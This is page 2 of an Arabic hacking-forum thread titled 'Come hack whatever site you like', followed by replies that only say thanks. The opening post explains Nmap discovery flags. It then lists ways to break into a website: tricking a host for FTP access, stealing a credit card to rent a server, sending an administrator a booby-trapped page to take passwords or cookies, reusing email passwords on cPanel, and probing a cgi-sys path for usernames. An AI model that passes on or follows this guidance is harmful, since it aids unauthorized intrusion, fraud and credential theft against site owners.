[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]
Start ----> Run ----> CMD -----> NMAP
وذلك لأنظمة تشغيل الويندوز
بمجرد إدخال IP أو Domain Name فإن NMAP يحدد الهدف المطلوب فحصه و ل NMAP القدرة علي فحص أي مدي من الأيبيهات في نفس الوقت ولكن ذلك سيأخذ وقت كبير جدا لإظهار النتائج ويجب أن يلاحظ أن في عملية الفحص عموما ليس من الضروري والمنطقي القيام بفحص جميع البورتات لإنها عملية ستأخذ وقت كبير جدا
عملية السكان و أوامر البرنامج في الحالات المختلفة وهي أوامر ليس لها علاقة بفحص البورتات أو نظام التشغيل
الامر sL
هو عبارة عن List Scan وبإستخدام فإن NMAP سيقوم بفحص الأي بي المحدد ولكن دون إرسال مجسات حقيقية و لكن النتائج في معظم الحالات إن لم تكن كلها تكون سلبية وهذا الأمر لا يمكن إستخدامه مع أوامر فحص البورتات و إكتشاف أنظمة التشغيل
الامر sP
هو عبارة عن Ping Scan الأمر مفيد إلي حد ما في عملية إسكتشاف الأجهزة العاملة في مدي أي بي معين أو المتصلة بسيرفر أو شبكة معينة
بإستخدام هذا الأمر فإن البرنامج يرسل رسالة ICMP وهي تعني Internet Control Message Protocol حيث يتم التأكد من مدي إستجابة الجهاز من عدمه وعموما ودون الدخول في التفاصيل الخاصة بهذه الرسالة فإن هذه الأداة تستخدم في إستكشاف الأخطاء الموجودة بالشبكة ومدي تقبل إتصال خدمة معينة وهذه الرسالة تطلب إتصال TCP إلي البورت 80 وهو البورت المخصص لبروتوكول ال Http . و عملية ال Ping في حد ذاتها عملية مهمة جدا بالنسبة للشبكات ولكن إستخدامها بمفردها لن يؤدي لأي نتائج لأن أي فايروول سيرفض العملية من أساسها ولكن الأفضل هو إستخدام أمر Ping مع أوامر أخري أكثر تعقيدا وسيتم شرح ذلك

الأمر P0
وهو يعني No Ping حيث لا يتم إستكشاف الأجهزة قبل البدء في عملية الفحص وهو أمر ضروري في حالات فحص البورتات و حالات فحص نوع نظام التشغيل مع ملاحظة أن و بإستخدام هذا الأمر فإن NMAP سيقوم بعملية الفحص بلا أي إسكتشاف ومعظم عمليات الفحص لا تتم بدون هذا الأمر

الأمر Ps
وهو يعني TCP SYN Ping وفيه يتم إرسال رسائل TCP فارغة في زمن محدد و ال TCP هو أحد بروتوكولات الإتصال ونقل البيانات بين الأجهزة داخل الشبكة أو عن طريق الإنترنت Transmission Control Protocol
وذلك إلي بورت أو أكثر حيث يتم تحديد رقم البورتات بجانب الأمر و إذا تم تركه فارغا فسيتم إستخدام البورت 80 . هذه الرسلة التي سيتم إرسالها ستطلب الإتصال و بالطبع فالجهاز الآخر سيرفض الإتصال برسالة RST أو reset وذلك في حالة إذا كان البورت مغلق و هو غالبا ما يحدث ولكن في حالة وجود البورت مفتوح فإن الرد سيكون بقبول الإتصال برسالة تسمي SYN/ACK TCP و في النهاية فإن جهازك سيقوم بإرسال رسالة RST reset ولكن الهدف هنا هو إكتشاف ودراسة رد الفعل من الجهازالآخر وليس إجراء إتصال فقبول الإتصال معناه وجود خطأ يجب إصلاحه أو إستغلاله حسب الحاجة

الأمر PA
وهو يعني TCP ACK Ping ولاحظ الإختلاف بين هذا الأمر وا لأمر الذي قبله حيث في هذا الأمر يستبدل syn بACK وذلك لتعريف رسالة الإتصال من البداية
ولاحظ أن إستخدام SYN أو ACK يزيد من فرصة التغلب علي الفايروول الخاص بالراوتر حيث يتم رفض الإتصالات بمجرد إرسال الرسائل الفارغة و كل فايروول له طريقته في التعامل مع مثل هذه الإتصالالت وهو ما سوف يتم شرحه في موضوع آخر

الأمر PU

يعني udp ping أي User Datagram Protocol و هو نوع آخر من أنواع الإتصال ونقل البيانات بين الأجهزة ولكن يتميز عن ال TCP بالسرعة حيث يتم إرسال رسائل قصيرة وسريعة في فترة وجيزة للغاية وبالطبع يتم تحديد البورت المراد إستخدامه بعد كتابة الأمر مباشرة ويمكن الإختيار من بين 65,535 بورت و بمجرد أن يتم إرسال من هذا النوع إلي الجهاز الآخر وعند وجود البورت مغلق فإنه يتم الرد برسال ICMP وبالتالي فإنه يتم إكتشاف أن الجهاز يعمل ومن الممكن إجراء سكان قوي عليه

وهذه الأوامر هي معظم الأوامر التي تستخدم في عملية الإستكشاف لأي أي بي أو شبكة
ومرة اخري فإن التدريب علي برنامج سيعلمك الكثير في أمور إستكشاف الشبكات و الأجهزة و إكتشاف الأخطاء
وبعد ذلك سيتم إستكمال الأوامر الخاصة بإكتشاف البورتات و نظام التشغيل وكذلك البرامج والخدمات التي يمكنها الإتصال وذلك بالجهاز أو الشبكة الذي يجري عليه الفحص

طيب هتقولى اعمل ايه يعنى بيه لو لاقيت بورتات مفتوحه و ده اكيد عندك حاجه من الاتنين يا أما تحاول تدخل عليها بالطريقه دى
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]
نشيل بورت و نحط رقم البورت و نشيل اسم الموقع و نحط اسم الموقع المراد
طيب ممكن ندخل من على الدوس و نعرف مثلا نوع الاف تى بى و ممكن نلاقيله ثغرات او عن طريق التلنت
طيب مفيش حاجه من اللى انت بتقولها دى نفعه اعمل ايه؟
تعالى اتعلم بعض الحيل
اول حيله انك تروح لشركة الاستضافه اللى عليها الموقع و تقول لهم انك عايز تجرب الخدمه قبل ما تشترك عندهم هيدولك باس و يوزر اف تى بى و عيش و مش فعالة قوى
ثانيا ممكن تسرق فيزا و تشترك فى السيرفر و نفس الكلام اللى فوق
ملحوظه سرقة الفيزات حرام شرعا و مرفوضه
ثالثا ممكن لو معاك ملير تلغم صفحه و تبعتها الادمن يعنى و تخترق جهازه و تطلع الباسوردات اللى على جهازه او تاخد الكوكيز ده لو انت ملقتش ثغرة اكس اس اس او تأخد اميله و ممكن تلاقى فيه الباس
رابعا تجرب باس الايميل فى السى بانل طيب هتقولى انا معيش اليوزر تعالى اوريك تطلع اليوزر ازاى
ندخل على الموقع المستهدف و بعد الرابط نكتب
cgi-sys/scgiwarp






This image has been resized. Click this bar to view the full image. The original image is sized 804x569 and weights 29KB.
الى هنا ينتهى الشرح تم بحمد الله
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
tamer2

avatar

عدد الرسائل : 1
تاريخ التسجيل : 08/04/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الجمعة أبريل 08, 2011 12:18 pm

مشكووووووووووووووووووووور
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
Sir.kavo

avatar

عدد الرسائل : 1
تاريخ التسجيل : 02/06/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الخميس يونيو 02, 2011 1:34 pm

شكرا يابرنس
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
baktti

avatar

عدد الرسائل : 1
تاريخ التسجيل : 10/06/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الجمعة يونيو 10, 2011 4:55 pm

مشكووووووووووورر
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
بلال العجوري

avatar

عدد الرسائل : 1
تاريخ التسجيل : 29/06/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأربعاء يونيو 29, 2011 10:40 am

مشكوووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووور
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
samy

avatar

عدد الرسائل : 1
تاريخ التسجيل : 08/07/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الجمعة يوليو 08, 2011 9:24 pm

مشكووووووووووووووور
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
momomikel

avatar

عدد الرسائل : 1
تاريخ التسجيل : 23/08/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الثلاثاء أغسطس 23, 2011 1:05 pm

thankssssssssssssssssss vVVVveeeeeeeerRRRrrry muUUUUuuucCCCCccHHHhhhhHHH
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
عبدالله جابر

avatar

عدد الرسائل : 1
تاريخ التسجيل : 25/08/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الخميس أغسطس 25, 2011 6:40 pm

مشكور والى الامام
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
الكابتن

avatar

عدد الرسائل : 1
تاريخ التسجيل : 28/07/2012

مُساهمةموضوع: مشكور   السبت يوليو 28, 2012 7:29 pm

مشكووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووووور
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
 
تعال اخترق الموقع اللى على مزاجك
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 2 من اصل 2انتقل الى الصفحة : الصفحة السابقة  1, 2

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
مرحبا بك في منتدى والهكر والاختراق :: منتدى الهاكر والاختراق :: مصطلحات عن الهاكر :: اختراق المواقع والمنتديات-
انتقل الى: